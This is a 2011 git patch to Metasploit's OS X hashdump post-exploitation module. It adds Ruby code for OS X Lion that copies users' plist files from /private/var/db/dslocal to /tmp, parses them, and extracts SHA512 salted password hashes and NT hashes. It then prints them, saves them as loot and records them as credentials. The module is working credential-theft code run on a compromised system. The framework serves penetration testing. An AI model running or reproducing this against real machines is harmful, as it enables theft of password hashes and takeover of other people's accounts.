From b8a232eaf56271025c68571824d8d2983362268f Mon Sep 17 00:00:00 2001
From: Carlos Perez <carlos_perez@darkoperator.com>
Date: Thu, 7 Jul 2011 03:46:33 +0000
Subject: [PATCH] Support for dumping OSX Lion SHA512 Salted hashes, thanks to
 hammackj for helping in figuring out how to parse the new format

git-svn-id: file:///home/svn/framework3/trunk@13111 4d416f70-5f16-0410-b530-b9f4589650da
---
 modules/post/osx/gather/hashdump.rb | 50 ++++++++++++++++++++++++++++-
 1 file changed, 49 insertions(+), 1 deletion(-)

diff --git a/modules/post/osx/gather/hashdump.rb b/modules/post/osx/gather/hashdump.rb
index a4f4c8d48d..961251a8da 100644
--- a/modules/post/osx/gather/hashdump.rb
+++ b/modules/post/osx/gather/hashdump.rb
@@ -28,7 +28,7 @@ class Metasploit3 < Msf::Post
 						This module dumps SHA1, LM and NT Hashes of Mac OS X Tiger, Leopard and Snow Leopard Systems.
 				},
 				'License'       => MSF_LICENSE,
-				'Author'        => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
+				'Author'        => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>','hammackj <jacob.hammack[at]hammackj.com>'],
 				'Version'       => '$Revision$',
 				'Platform'      => [ 'osx' ],
 				'SessionTypes'  => [ "shell" ]
@@ -151,6 +151,54 @@ class Metasploit3 < Msf::Post
 				when /shell/
 					guid = session.shell_command_token("/usr/bin/niutil -readprop . /users/#{user} generateduid").chomp
 				end
+			elsif ver_num =~ /10\.(7)/
+				require 'rexml/document'
+				hash_decoded = ""
+				profiles = cmd_exec("ls /private/var/db/dslocal/nodes/Default/users").split("\n")
+				if profiles
+					profiles.each do |p|
+						next if p =~ /^_/
+						next if p =~ /^daemon|root|nobody/
+						cmd_exec("cp /private/var/db/dslocal/nodes/Default/users/#{p.chomp} /tmp/")
+						cmd_exec("plutil -convert xml1 /tmp/#{p.chomp}")
+						file = cmd_exec("cat /tmp/#{p.chomp}")
+						doc = REXML::Document.new(file)
+						hash_text = doc.elements.to_a("///array")[2].elements["data"].text.gsub("\n\t\t","")
+						hash_text.unpack('m')[0].each_byte do |b|
+							hash_decoded << sprintf("%02X", b)
+						end
+						user = p.scan(/(\S*)\.plist/)
+						sha512 = hash_decoded.slice(104..213)
+						nt_hash = hash_decoded.slice(214..249)
+
+						print_status("SHA512:#{user}:#{sha512}")
+						file_local_write(sha1_file,"#{user}:#{sha512}")
+						report_auth_info(
+							:host   => host,
+							:port   => 0,
+							:sname  => 'sha512',
+							:user   => user,
+							:pass   => sha512,
+							:active => false
+						)
+
+						if nt_hash !~ /000000000000000/
+							print_status("NT:#{user}:#{nt_hash}")
+							file_local_write(nt_file,"#{user}:#{nt_hash}")
+							report_auth_info(
+								:host   => host,
+								:port   => 445,
+								:sname  => 'smb',
+								:user   => user,
+								:pass   => nt_hash,
+								:active => true
+							)
+						end
+					end
+				end
+				return
+
+
 			end
 
 			# Extract the hashes